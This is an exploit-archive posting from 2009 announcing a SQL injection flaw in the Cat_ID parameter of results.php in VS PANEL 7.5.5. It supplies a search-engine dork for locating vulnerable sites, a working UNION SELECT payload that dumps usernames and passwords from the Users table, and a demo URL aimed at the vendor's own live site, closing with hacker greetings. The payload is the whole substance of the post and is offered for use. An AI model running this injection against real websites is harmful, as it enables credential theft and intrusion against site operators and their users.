[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : VS PANEL 7.5.5 (results.php Cat_ID) SQL Injection Vulnerability
# Published : 2009-07-16
# Author : C0D3R-Dz
# Previous Title : ZenPhoto Gallery 1.2.5 Admin Password Reset (CRSF)
# Next Title : PHP Live! 3.2.1/2 (x) Remote Blind SQL Injection Vulnerability


####################################
  # Homepage: http://www.vspanel.gr/ #
  # Product: VS PANEL v.7.5.5        #
  # DeScOvRed By:C0D3R-Dz            #
  # File: results.php                #
  # ContACt:cD_@LinUxmAIL.OrG        #
  # Dork: "Powered by VS PANEL 7.5.5"#
  ###################################
################################### SQL Injection#####################################
# results.php?Cat_ID=-6+union+select+1,concat(username,0x3a,password),3,4+from+Users--#
#######################################################################################


################################### DeMo ############################################################
#www.vspanel.gr/results.php?Cat_ID=-6+union+select+1,concat(username,0x3a,password),3,4+from+Users--#
#####################################################################################################


#########################################
#Greetz to:His0K4-HouSsem_PHp-HacKdZ    #
#                 IncluDeR              #
######################################### 

# www.Syue.com [2009-07-16]